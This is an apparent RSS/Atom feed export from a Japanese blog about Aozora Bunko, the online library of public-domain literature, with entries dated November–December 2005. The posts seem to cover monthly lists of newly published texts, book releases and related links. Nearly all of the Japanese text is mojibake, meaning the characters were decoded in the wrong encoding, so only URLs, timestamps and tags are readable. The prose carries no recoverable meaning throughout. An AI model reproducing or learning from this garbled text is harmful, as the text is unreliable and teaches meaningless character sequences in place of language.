    ¡¡¼¡₪ֲֻ¿₪₪₪־₪¬¹ס»»ֻֿ÷₪ַ¡¢£¸÷מֹ¡ְײ³»ׂ¶וֿ÷±¦±ּׂח₪־ּ¼¡¢עםׂ₪עµ₪אָ‏¾¯ַ¯¡¢ףְּ¹ֲ¢ֲו¼ףְֱֵג¡¢¶¿²נֻ¡»ױ¡¢ֱ±°­־¾ֱּּֽ¾®ֱ־¡¢ֶף¿ִֽ®ֵ¡¢ײ±»³₪־±£»־¡¢ֲ¼°זִ¹°ֳµ­ּ¾₪־»±¡¢¡ֻ¸ר³«₪µ₪ל₪¿¡£ֲוֹ½ֵ×₪ִ¹װ₪ֿ÷מ¶ֳָז₪₪־₪ַ¡¢ֳ»װ¡¦ֳזװ₪־¸ר³«₪¬ֲ³₪₪₪ֶ₪₪₪כ¡£¹ס»»ֻֿ÷₪ְֿײ³»ׂ¶וֿ÷±¦±ּׂח₪ָ₪₪₪¦¿ֽ×₪¬µ₪₪ֶֻ‏₪ֳ₪¿₪ט₪¦₪ַ¡¢ּ¼₪ְ₪±₪ַ₪₪¯ֻ¿ֽ₪ע¼ט₪ך°·₪ֳ₪¿÷מֹ¡ײְײ³»ׂ¶וֿ÷±¦±ּׂח¡׳₪ג₪¢₪כ¡£₪₪¿¡¢ִ¹װ₪ֻ₪ג´י₪ע½׀₪·₪ֶ₪₪₪כ¡₪ֹ₪־ִ¹װ₪«₪ֶֹֿ₪ף₪ַ₪₪ֶ₪־₪׳₪·₪¡ֻ¡£

    - -

    ¡¡ֲח½°¾®ְג₪־ֲוֹ½÷מ¡¢־׃ֹװֻ÷¡ײֳ°²¼÷¸ֱ·¡׳₪ג¸ר³«₪µ₪ל₪¿¡£ְִ¶ץ¸¸ֻ₪ַ₪ֿ¡¢¡ײֳ°²¼÷¸ֱ·¡׳₪ע´¥±ְ÷¥־µ₪־´¬¡¢₪³₪±±מ₪־´¬¡¢ֶ¸ק₪־´¬₪־»°ֹפ₪ֻ¬₪±₪ֵֶ׀ֿ¿₪·₪ֶ₪₪₪כ¡£¡ײ₪³₪±±מ₪־´¬¡׳₪ֿ¡¢£²£°£°£¶ַ¯£±·מ£¸ֶ¸ר³«ֽ½ִך₪ַ₪¢₪כ¡£

    - -

    ¡¡ֵֽ₪·₪₪ּ£₪ן₪₪₪־÷מֹ₪ָ₪·₪ֶ₪ֿ¡¢ּ´ּמµ׳÷מ₪¬£²÷מֹ¡´ד₪ע³«₪¯¡¢³¼¹₪־¹ץז¡ֻ¡¢ָֹֽר»ֽֿ÷₪¬£±÷מֹ¡»¦¿ֽµ´¡ֻ¸ר³«₪µ₪ל₪¿¡£²רֳּ₪־₪ט₪¦₪ֳֿ₪ָ₪₪₪¦°ױּ£₪ַ₪ֿ²¬ֻו÷ֶ²¡ײִה¼ײ¾ל₪־¾¯½ק¡¿·»ת¿·²¾ּ¾¡ֻ¡׳₪ג₪³₪³₪ֻ¾ׂ²נ₪¹₪כ₪₪­₪«₪ג₪·₪ל₪₪₪¡£¡ײִה¼ײ¾ל₪־¾¯½ק¡׳₪ֿ¡¢¿·»תµל²¾ּ¾¥ױ¥¡¥₪¥כ₪¬₪¹₪ַ₪ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£÷£²ף₪ִּֿלֻ₪ֻ₪ט₪כ¿·»ת¿·²¾ּ¾¥ױ¥¡¥₪¥כ₪־¸ר³«₪ַ₪¢₪כ¡£

    - -

    ¡¡¡ײµל¹ֶֻ¶¶¡׳₪¬ְִ¶ץ¸¸ֻ₪ַ¸ר³«₪µ₪ל₪ֶ₪₪₪כִ¹ֳ«ְמ»‏±«₪־₪ג₪¦°ל₪ִ₪־ֳרּ¾₪½סְׂ¡ײָ‏¿ֱֵֽ¡׳₪«₪י¡¢¡ײ¥¥ְ¥אִחֵ¡׳₪¬ֵ׀ֿ¿₪µ₪ל₪ֶ₪₪₪כ¡£ְמ¾ו²»ֶףֿ÷₪ָ₪ָ₪ג₪ֻ¥¢¥ב¥ך¥«₪ֵֻֿ₪ֳ₪¿₪ך¡¢¥ׁ¥ך₪־ַמֽק²ס₪ֻ½׀₪¿₪ך¡¢₪ָ₪₪₪ֳ₪¿ֵֻצ₪ַָֻֻׁ¾ז₪ְ¸³¶₪־°לֳ¼₪¬ֱֹ₪«₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿ²ְֶּ׀₪¬£³÷מֹ¡»ׂµ¬₪־²ט¡¢ֻֽ₪־ְ־¡¢ְ¾ֽ־₪ֻ₪ֿ₪₪₪¡ֻ¡¢¿¹²×³°₪¬ֻּץ₪ע´₪ב₪ֶ£²÷מֹ¡ֵ₪־²¦¡¢½ֲ¹¾ֳך÷״¡ֻ¡¢ֲֻּ¼ֶ©ֳ«₪¬£²÷מֹ¡±ְ₪»ם²ָ₪ָ½קְ­¡¢½ט½ק₪־½ד·י₪עְֿ₪÷¡ֻ¡¢ֳµ׳ּ´ֶף₪¬£³÷מֹ¡ְטְ¸₪־´י¡¢ֵװ₪־´ד¡¢¥³¥ֹ¥ג₪־¥¹¥±¥ֳ¥ֱִ¡ ֶ°×±א₪ֻ₪ֶ¡ֻ¡¢»ִֵֶֹׂ§₪¬£²÷מֹ¡¾¼ֲֶֿףַ¯₪־ֶף²²ס₪ָָ‏½ׁ±¡¡¢¿ֽ₪־¸ְֽױ¡½¡½¼«¬₪־¸ְֽױ¡ֻ¡¢ֵח÷ךֶ£ֲ¼₪¬£±÷מֹ¡»³±¢ֵ»÷¡ֻ¡¢־׃ֹחָ‏»ׂ₪¬£±÷מֹ¡ַ¨₪ל₪¿°±¡ֻ¡¢ֻּׂמ¿®°ל₪¬£±÷מֹ¡µ´־ֲ¼¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-02T07:20:50+09:00 -
    - -¡ײ¶ץ¿§ִּ¿®¡׳³«»ֿ₪־¹נֳ־ -http://www.siesta.co.jp/aozora/archives/002420.html - -¡ײ¶ץ¿§ִּ¿®¡׳₪ֲָך₪·₪ֶ¡¢ְִ¶ץ¸¸ֻ₪־°ל·מ¬₪־¸ר³«÷מֹ₪ֻ´ֳ±₪¥³¥ב¥ף¥ָ₪ע₪¹₪כµ­»צ₪ע¥¢¥ֳ¥׳₪·₪ֶ₪₪¿¡£¹¥ֹ¾₪₪י₪׀¡¢¾¯₪·ך₪ֳ₪ֶµ­»צ₪ע÷מְ®₪·₪₪·₪ח₪¦¡£
    -

    ]]> -¡¡ֵּ×₪ֿ¡¢₪ׂ₪ָ·מ₪־ְִ¶ץ¸¸ֻ₪־ֶ°₪­₪ע³µ´ׁ½׀ֽט₪כ₪ט₪¦₪ֻ₪¹₪כ₪³₪ָ¡£¸ר³«÷מֹ₪ֻ₪ִ₪₪₪ֶ₪ֿ¡¢¿·ֳו¾נף₪עֽרֽׁ₪¹₪ל₪׀₪₪₪₪₪־₪ְ₪±₪ֹ¡¢ַ¯ְּ₪±₪ֻ₪ֿ¥ך¥»¥ֳ¥ָ₪µ₪ל₪ֶ₪·₪₪¦₪־₪ַ¾¯₪·ֹװ״¡£¥¿¥₪¥¥ף¥°₪ָ₪·₪ֶ₪ֿ·מֻצ₪ֻ¡¢₪½₪־·מ₪־ְִ¶ץ¸¸ֻ₪־¥ֻ¥ו¡¼¥¹₪ָ¸ר³«÷מֹ₪״₪־¥³¥ב¥ף¥ָ₪עµ­»צ₪ֻ₪·₪ֶ₪₪¿₪₪¡£½׀ֽט₪כ₪ְ₪±¿½ס¥«¡¼¥ֹ₪״₪־¥ך¥ף¥¯₪ע»ֵ¹‏₪ף₪ַ₪₪¿¡£²בµמ₪־÷מֹ₪ָ₪־¥ך¥ף¥¯₪¬₪¢₪כ»‏₪ֻ₪ֿ¡¢ְ־₪־¸ר³«÷מֹ₪״₪־¥ך¥ף¥¯₪גִ¥₪ֳ₪ֶ₪×₪­₪¿₪₪¡£₪ג₪ֱ₪ם₪ף¡¢ֱ´₪ֶ₪־÷מֹ₪עֶֹ₪ף₪ְ¾ו₪ַ₪־µ­»צ₪ַ₪ֿ₪₪₪₪־₪ַ¡¢₪×µ₪₪ֶֻ‏₪ך₪־÷מֹ₪״₪־´¶ֱ₪ע¥³¥ב¥ף¥ָֽף₪ֻ´ף₪»₪ֶ₪₪₪¿₪ְ₪±₪כ₪ָ₪¢₪ך₪¬₪¿₪₪¡£
    -¡¡¶ץ¿§ִּ¿®₪־ֲט°ל¹ז₪ֿ₪³₪ֱ₪י¡£
    -

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-01T22:40:02+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£±£±·מ¹ז -http://www.siesta.co.jp/aozora/archives/002419.html - -£²£°£°£µַ¯£±£±·מ₪ֿ¡¢£µ£³÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¼ח₪¥ֻ¥ו¡¼¥¹₪ָ₪·₪ֶ₪ֿ¡ײְִ¶ץ¸¸ֻֻ¡׳₪־½׀ַָ₪¬₪¢₪כ¡£
    -

    ]]> -¡¼ח₪¥ֻ¥ו¡¼¥¹¡
    -ְִ¶ץ¸¸ֻ₪־ֻ₪¬½׀ַָ₪µ₪ל₪¿¡¾₪·₪¯₪ֿ₪³₪ֱ₪י¡ֻ¡£₪³₪ל₪ַ¡¢ְִ¶ץ¸¸ֻ₪־₪³₪ָ₪עֳ־₪כ¿ֽ₪¬ֱ‎₪¨₪ֶ₪¯₪ל₪כ₪ָ₪₪₪₪₪₪¢¡¢₪ָ»׳₪¦¡£

    - -

    ¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£±£±·מ₪ֻ₪ֿ¡¢£µ£³÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ´ִֵ¹ס»־₪ַ¡¢£±£¹÷מֹ¡ַ׀ֽ¥₪־ֱַ¼ֱ¡¢ַ׀ֽ¥ְֽ®₪ָ¿ֽ÷אָ¯¸«¡¢ֳ¼ּע¡¢·־¸ֵ»¨´¶¡¢¼±ִ₪ָ¸³״¡¢µבֲ²ָ¡¢₪»₪ך₪ױ¡¢÷ַ₪ג₪ט₪¯·ֵֿ‎₪ֵ₪±₪י₪ל₪¿µ÷¶ֱׁ½ס¡¢־‎½¬¶¡¢¿··א³¦₪־¬ּמ¡¢¿··א¶¨²ס₪־¹¹ְ¸₪ֻ₪ִ₪₪₪ֶ¡¢¿··א¼«³ט₪־ֶ»¡¢¿··א±¿ֶ°₪־ֶף₪ִ₪־ֶ»¡¢¿··א¶¨²ס¸ר±י₪ְֻט₪ְ₪ִ₪ֶ¡¢¿··א₪־´םµ¡¡¢¿·¹ס·א₪־¡ײ²°¾וִם±א¡׳₪ע´ׁ₪ֶ¡¢ֲחְµֹקֲ¯¹ֽ¡¢¡ײ¥¼¥ף¥¥₪₪־µ÷₪ל¡׳₪ֻ½¢₪ֶ¡¢¡ײ¥¼¥ף¥¥₪₪־µ÷₪ל¡׳₪ֻ½¢₪₪₪ֶ¡ֻ¡£¡ײ´ִֵװ¢»־ֱ´½¸¡¡20¡׳₪ֻ¼‎ֿ¿₪µ₪ל₪¿ֲחְµֻצ₪«₪י¾¼ֲֿ½י´₪־¿ןֹ®₪ַ₪¢₪כ¡£»ה₪־₪×µ₪₪ֶֻ‏₪ך₪ֿ¡ײֳ¼ּע¡׳¡£

    - -

    ¡¡ֲֻּ¼ֶ©ֳ«₪ֿ¡¢£¸÷מֹ¡³ֶ¿ֽ¿´µֶג₪־ָכµ¡¢µׂµן¶צֿ¿¡¢µ´¿´ָףµ´¿´ ¡¼ֲ¹¡ֻ¡¢½©ֱכ»¨µ­¡¢¼ח₪־₪ִ₪ָ₪ב¡¢¿´µ¡ּ¯ׁ₪עְֿ₪÷¡¢ֲ¾³¦₪ֲֻ׀₪¹₪כ´ַׁ°¡¢»°ֶ¸¸¶­¡ֻ¸ר³«₪µ₪ל₪¿¡£¥׀¥י¥¨¥ֶ¥£₪ֹֻ₪ף₪ְ÷מֹ·²₪ַ₪¢₪כ¡£₪³₪ל₪ֲַֻּ¼ֶ©ֳ«₪ֿ£³£²÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪³₪ָ₪ֻ₪₪כ¡°לֽק₪ֿ₪³₪ֱ₪י¡ֻ¡£

    - -

    ¡¡ְפ¶ְ²ײ₪ֿ¡¢¿·»ת¿·²¾ּ¾¡¿µל»תµל²¾ּ¾₪־½ֵ£₪ע´₪א₪¬¡¢£¶÷מֹ¸ר³«₪µ₪ל₪¿¡־¹ֱ־¡¢ְד₪־ֽד¡¢ְד־מµ­»צ¡µל»תµל²¾ּ¾¡ֻ¡¢ְד־מµ­»צ¡¿·»ת¿·²¾ּ¾¡ֻ¡¢ְד־מֲ³µ­¡µל»תµל²¾ּ¾¡ֻ¡¢ְד־מֲ³µ­¡¿·»ת¿·²¾ּ¾¡ֻ¡ֻ¡£µל»תµל²¾ּ¾₪־¡ײ¶ְ²ײֱ´½¸¡׳ִלֻ₪־¥ױ¥¡¥₪¥כ₪¬£´₪ִ₪¢₪כ¡£ֱם¥כ¥׃₪₪־₪ַxhtml¥ױ¥¡¥₪¥כ₪¬₪¹₪´₪₪₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪¬¡¢Azur₪₪ֹ₪־½ִ½ס₪­¥ײ¥י¥¦¥¶₪ֱַם¥כ¥׃₪־¶ְ²ײ₪עּ£₪ן₪ֳ₪ֶ₪₪·₪₪¡£¡ײְד־מµ­»צ¡׳¡ײְד־מֲ³µ­¡׳₪ֿ¿·»ת¿·²¾ּ¾₪ָµל»תµל²¾ּ¾₪־ֶף₪ִ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£½׀ֽט₪ל₪׀ֶֹ₪ָז₪₪ֶ₪₪ֶ₪₪·₪₪¡£

    - -

    ¡¡ׁ₪ֳ₪¿₪ָ₪³₪ם₪ַ₪ֿ¡¢¡ײ¶ְ²ײֱ´½¸¡׳₪־ֹױֿ¿÷‎»ׂ₪«₪י¡¢¿ו¾וֲלְֲֿ÷¡ײ³׀½ס¡׳¡¢µ÷ך¸׀½ט»ׂ¡ײְפ¶ְ²ײ÷מ¡״³°²¼¼¡¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¡ײְפ¶ְ²ײ÷מ¡״³°²¼¼¡¡׳₪ֿ¿·¿ֽ÷מ²ָ₪ָ₪·₪ֶ₪־ְפ¶ְ²ײ₪״₪־ָדֹ¾₪ַ₪¢₪ך¡¢¡ײ³׀½ס¡׳₪ֿ¶ְ²ײ₪״₪־ִֵֹי¸₪ַ₪¢₪כ¡£µ÷ך¸׀½ט»ׂ¡ײְפ¶ְ²ײ÷מ¡״³°²¼¼¡¡׳₪ֿ¡¢¼ן¡¹₪־ֻµְֵ₪ע¶מ»ָ₪·₪¿¥ֶ¥­¥¹¥ָ₪₪־₪ַ¡¢½׀ֽט₪ל₪׀Azur₪₪ֹ₪־ֻµְֵ₪־°ד₪₪₪עֹ½¼¨½׀ֽט₪כ¥ײ¥י¥¦¥¶₪ֶַֹ₪ף₪ַ₪₪·₪₪¡£

    - -

    ¡¡ֵחְִֵ¶¼¡ֿ÷₪ֿ÷£²ף₪־¸ר³«÷מֹ₪¬½יֵ׀ֿ¿₪ַ₪¢₪כ¡¡ײ¼ד²ך¡׳¡ֻ¡£ָב·א₪־÷מ²ָ¡¢ֵחְִֵ¶¼¡ֿ÷₪ֻ₪ִ₪₪₪ֶ₪ֿ¥ך¥ף¥¯ְט₪₪ֹ₪ע»²¾ָ¡£ֲ¾₪ֻ₪גֲח÷מ₪¬ּ₪ֳו¼ך₪ַ₪¢₪כ¡£¸ר³«÷מֹ₪ֻ»ֹ·ב₪µ₪ל₪ֶ¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ל₪כ¿ֽ₪¬¸½₪ל₪כ₪³₪ָ₪עֻ¾₪א¡£

    - -

    ¡¡¿הֽ‎¾®ְג₪ָ₪·₪ֶ¡¢¥¨¥ֹ¥¬¡¼¡¦¥¢¥י¥ף¡¦¥¡¼¡÷´¡¹ִּ¾¼¡ֿ÷ּץ¡ֻ₪¬£²÷מֹ¡¥ב¡¼¥כ¥¹¥ָ¥ם¥א₪־ְ±²¡¢¥¦¥£¥ך¥¢¥א¡¦¥¦¥£¥כ¥¹¥ף¡ֻ¡¢¹ֳ²ל»°ֿ÷₪¬£´÷מֹ¡ְִֹ‏₪־ֳֻ¡¢ֳ״יב¡¢אטאב₪־¥ׁ¥₪¥׳¡¢²«ִ»₪־ֳ²₪­¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¥¡¼₪ֿ¡¢¥´¥·¥ֳ¥¯¥־¥¥כ₪ָ₪₪₪¦‎₪¬ְµ₪·₪₪₪«₪ג₪·₪ל₪₪₪¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿ¡¢¿¹²×³°₪¬£µ÷מֹ¡ֹבְֱֳז¡¢¸₪ֵ₪«₪₪¡¢₪₪«₪¸₪­₪ך¡¢¶ץ¼ײ¡¢´ח¡ֻ¡¢ְֲ÷ֻ¼£₪¬£³÷מֹ¡²ֲֶ¡¢I can speak¡¢ֵפהֶ¡ֻ¡¢µֳֶ׃´²₪¬£±÷מֹ¡ֵח¸¶¿´ֳז¡ֻ¡¢»°ֽ·ִג±ִ«₪¬£±÷מֹ¡¾¾₪ֶָ£·µ¸₪־ֲ״ּז¡ֻ¡¢־כּ»°½ֵµָ₪¬£±÷מֹ¡ְיִ»¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£±ִ«₪־¸ל₪ך¸‎₪ֿ¡¢₪ה₪ֿ₪ך₪µ₪ֳ₪ׁ₪ך₪ָ₪·₪ֶ₪₪₪ֶ₪ט₪₪¡£

    - -

    ¡¡ֽט·מ₪־¸ר³«ֽ½ִך₪ֻ₪ֿ¡¢½יֵ׀ֿ¿₪־¿־²ֻ§ֽ÷₪־ּ¾ֱ°₪¬₪¢₪כ¡£ֲ¾₪ֻ₪ג¥ְ¥ף¥ֶ¡ײ¿ְ¶¡׳₪₪ֹ₪־ֲח÷מ₪ג₪¢₪כ₪ט₪¦₪ְ¡££µ£°£°£°÷מֹ₪ג¶ב₪₪₪־₪ַ¡¢÷£ַ¯₪־ִש₪ב₪¯₪¯₪ך₪־ְִ¶ץ¸¸ֻ₪ע³₪·₪₪·₪ֶ¡¢₪³₪־µ­»צ₪ע½×₪ן₪כ₪³₪ָ₪ֻ₪¹₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-01T22:36:08+09:00 -
    - -µ­ַ°»£±ֶ -http://www.siesta.co.jp/aozora/archives/002403.html - -¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¿½ס´¡¡ְִ¶ץ¸¸ֻ

    - -

    ₪­₪־₪¦₪¢₪¿₪ך₪«₪י½סֵ¹₪ֲֻ₪ף₪ַ₪₪₪כ¡״¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¿½ס´ ְִ¶ץ¸¸ֻ¡₪־¸«ֻ₪¬₪ַ₪­₪¿₪־₪ֿ÷£·מ£·ֶ₪־₪³₪ָ₪ַ₪·₪¿¡£ֽ¼‎₪₪י₪׀₪₪ֱ₪¬₪₪₪₪¯ֶֿ₪₪₪ֶ₪₪₪כ₪ָ¸ְ₪ן₪ל¡¢¿ְִ®₪ֻ₪¢₪כ½׀ַָ¸µ₪־₪ֿ₪כ½סֻ¼₪ֻ¸«ֻ₪ע¸«₪ֻ₪ַ₪«₪±₪₪·₪¿¡£₪³₪־ּ₪ַ´°ְ®₪·₪¿ֻ₪ע¸«₪¿₪₪₪ָ₪₪₪¦»׳₪₪₪ֶֿ±₪¸₪₪־₪«¡¢´״·¸¼װ₪¬ְ×ֲ·₪₪₪·₪₪·₪¿¡£װ½¸ֵ‎³ח₪־µְמֵµ»ׂ₪µ₪ף¡ֱ°־ף÷¸¡ֻ₪¬ֽׁ°ױ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿¥¹¥ׁ¡¼¥¯¥ך¥ף¥°¥ן¥₪¥ף₪ַ´¥ַױ¡×¡¡₪½₪·₪ֶµ­ַ°»£±ֶ₪ע¥ׁ¥ֱ¥ך¡£

    ]]> -÷´µ׳´ײ₪µ₪ף¡¸ו־ף±¦¡ֻ₪ֿ±ִ¶ֳָ´ֵצ₪ַ₪¹¡£₪³₪־ֶ₪¹₪ַ₪ֲֻח¼ך½סֵ¹₪«₪יֳם¸₪¬₪ֿ₪₪₪ֳ₪ֶ₪₪₪₪·₪¿¡£ְִ₪₪¥«¥׀¡¼₪ע₪ָ₪כ₪ָֹ½»ז₪ֿ½דַע¡£װֳר¼װּמ¸‎±ׁ»₪µ₪ף¡¸ו־ףֳז±¡ֻ₪־₪³₪ְ₪ן₪ך₪־¿§₪ַ₪¹¡£

    - -

    ִֵֹ־ְׁ¸₪µ₪ף¡¸ו־ף÷¸¡ֻ₪¬±¦¼ך₪ֻ»‎₪ֳ₪ֶ₪₪₪כ₪₪₪ה₪ֻּ־©₪ֳ₪ֶ₪₪₪כֻ₪ֿ¡״ֶֻ₪־ְְֵֿ2005¡₪ַ₪¹¡£ֳר÷מ¸¢₪ֻ₪ִ₪₪₪ִֵֶֹ₪µ₪ף₪¬½ס₪₪₪ֶ₪₪₪כ₪³₪־ֻ₪גֶ±₪¸ֶ₪ֶֻֿ₪₪₪¿₪ָ₪־₪³₪ָ¡£₪¢₪ן₪»₪ֶֶֹ₪א₪ָ₪×₪ג₪·₪ם₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ½µֻצ₪ֻֿ²°₪µ₪ף₪ֻ¹װ₪ֳ₪ֶ¡¢₪¼₪ׂ₪ָ₪ג¼ֲ×₪ע¸«₪ֶ₪¯₪ְ₪µ₪₪¡£

    ]]> -
    -book -ָ¬´¬ָ‏·ֳ -2005-11-19T02:05:28+09:00 -
    - -¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¿½ס´¡¡ְִ¶ץ¸¸ֻ -http://www.siesta.co.jp/aozora/archives/002396.html - -¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¿½ס´¡¡ְִ¶ץ¸¸ֻ

    - -

    ְִ¶ץ¸¸ֻ₪־ֻ₪¬₪ַ₪­₪₪·₪¿¡£
    -http://www.harushobo.jp/2005_11_01.html
    bk1₪ַ₪־¹״ֶ‏₪ֿ₪³₪ֱ₪י₪״
    amazon₪ַ₪־¹״ֶ‏₪ֿ₪³₪ֱ₪י₪״

    - -

    ֽט½µ₪־ֳז÷¢₪ֻ₪ֿ½סֵ¹₪ֲֻ₪ײ₪ף₪¸₪ד₪₪₪₪«₪ָ»׳₪₪₪₪¹¡£
    -₪³₪ל₪ַ¡¢ֳר÷מ¸¢₪־¸מ´´ײ70ַ¯±הִ¹₪ֻ₪ִ₪₪₪ֶ¡¢¾¯₪·₪ֲֳֿֿך₪ֻ₪₪ֳ₪ֶ₪¯₪ל₪ל₪׀₪ָ´ך₪ֳ₪ֶ₪₪¹¡£

    ]]> - -
    -book -ag -2005-11-10T15:41:50+09:00 -
    - -ֹם»ׂ -http://www.siesta.co.jp/aozora/archives/002395.html - -¡¡¾כ₪־ֳֿ²¼¿¼₪¯¡¢₪ׂ₪ָ₪ך₪³₪ג₪ֳ₪ֶֽ­ֶַ¿¢×₪ע₪½₪ְ₪ֶ₪כ¾¯½ק¡£ְ¸₪ָ»א₪־ָכּ©₪ע₪µ₪°₪ם₪¦₪ָ₪¹₪כ¶״₪¸₪י₪ל₪¿ֳµµב¡£₪ְ₪ל₪ֻ₪גְּ¡₪¢¡ֻ₪«₪¹₪³₪ָ₪־₪ַ₪­₪₪₪¸ֶָֹ₪¹װ°¡£ֶ±ְ₪ֲו₪־ֽ§₪¿₪ֱ₪ָ₪¿₪ן₪א₪ל₪כ₪ט₪ך₪ג¡¢ֹ¡₪³₪ן¡ֻ₪¬₪י₪ל¶²¡₪×₪½¡ֻ₪ל₪י₪ל₪כ°·ֱ₪־ְ¸×₪¿₪ֱ₪ע₪₪₪ָ₪×₪·₪א¡£ךµ¡₪א₪·¡ֻ₪ֻ÷²¡₪¿₪₪·₪₪¡ֻ₪ע₪¦₪׀₪ן₪ל₪כ¡¢₪ָ¿ֽ₪ֿ₪₪₪¦¡£₪₪₪ֳ₪½¡¢₪¢₪₪¿₪¿₪ֱ₪ָ°לֲ־₪ֻ₪₪ל₪¿₪י₪₪₪₪₪־₪ֻ¡¢₪ָ₪µ₪¨ָא½ק₪ֿ´ך₪¦¡£
    -

    ]]> -¡¡¿·¹¼ְׂג₪ֿ¡¢₪µ₪ֳ₪½₪¯₪־₪´₪ָ₪¯¥ֽ¥ֳ¥ָ₪־¸ק₪ָ±ְֶֿ₪עֵ¸³«₪¹₪כ¡£¥ֽ¥ֳ¥ָ₪¬»ׂ₪ֹ₪ג₪¿₪ֱ₪ע´ם¸±₪ֻ₪µ₪י₪·₪ֶ₪·₪₪¦¡¢¥ֽ¥ֳ¥ָ₪־³²°­¡¢₪א₪«₪·₪ֿ₪³₪ף₪₪³₪ָ₪ֿ₪₪«₪ֳ₪¿¡¢¥ֽ¥ֳ¥ָ₪ֿ´ם¸±₪ְ¡¢₪ָ¡£¥ֽ¥ֳ¥ָ₪¬¾נף₪״₪־¥¢¥¯¥»¥¹₪ע¶ֳ°ֵ×₪ֻ²ֲֳ®₪µ₪»₪¿₪ָ₪₪₪¦ּּ₪ֿ₪₪ֱ₪¬₪₪₪₪₪₪ְ₪ם₪¦¡£½פ¼ך₪ע₪¢₪²₪ֶ£ֹ£װ₪ע¾־»¿₪¹₪כµ₪₪ג₪₪₪¡£₪¿₪ְ₪·¸¶°ר₪־₪¹₪₪ֶ₪ע¥ֽ¥ֳ¥ָ₪־₪»₪₪₪ֻ₪·₪ט₪¦₪ָ₪¹₪כ₪₪י₪׀¡¢₪×₪½₪י₪¯₪½₪ל₪ֻ₪ּֿµֽ‎₪¬₪¢₪כ¡£¥ֽ¥ֳ¥ָ₪־₪»₪₪₪ֻ₪·₪ֶ₪·₪₪ֳ₪ֶ₪ֿ¡¢₪½₪ל°¾ו¹ֽ₪¨₪¿₪³₪ָ₪ֻ₪₪י₪₪₪¡£ֻטֵֻטֵ₪־»׳¹ִֽה»₪ג₪₪₪₪₪ָ₪³₪ם₪ְ¡£₪ֹ₪¦₪ה₪י₪³₪־»צ·ן₪ֿ¡ְֵָ¡ֹ₪ַ₪¢₪ך¡¢ְ‏₪הּּ₪״₪ָָ¯ֵ¸₪·₪¿·ְֱ׳₪ֿ₪₪¢₪¿₪י₪₪₪¡£₪½₪ל₪¬₪»₪ב₪ֶ₪ג₪־µ₪₪₪«¡£
    -¡¡
    -¡¡¹סֶג₪ֻ₪×₪₪₪ֶ¡¢ֶַ×»צ·ן₪¬ָֹׁ¯₪·₪ֶ₪₪₪כֽ‎ֽ³₪ֿ₪µ₪₪¶₪¿ה»¡₪ַ₪­₪כ₪ְ₪ם₪¦¡£₪₪¿¡¢₪µ₪₪¶₪₪´ְֵׁ₪«₪י¿ה»¡₪¬»מ¡₪³₪³₪ם¡ֻ₪₪י₪ל₪ֶ₪₪₪₪₪ְ₪ם₪¦¡£₪³₪³₪ַ₪ֿ¡¢ֳֿ²¼ֵ´¥µ¥ך¥ף»צ·ן₪־ּ₪ְ¶»»¡¢ְֲ¿ֽ־ְןֱט₪ַ₪־ֶַ×»ָֽׁ₪־ּ₪ְ¶»»¡¢₪µ₪«₪־₪₪ֳ₪ְֶּ¼£°¿·¡¦ךֳ₪ְןֱט¡¢₪µ₪י₪ֻ₪½₪ל°ֱ°₪־־ע»ֻ₪־ּ₪ְ¶»»₪¬±ֶ¶ֱ₪·₪ֶ₪₪₪כ₪־₪ַ₪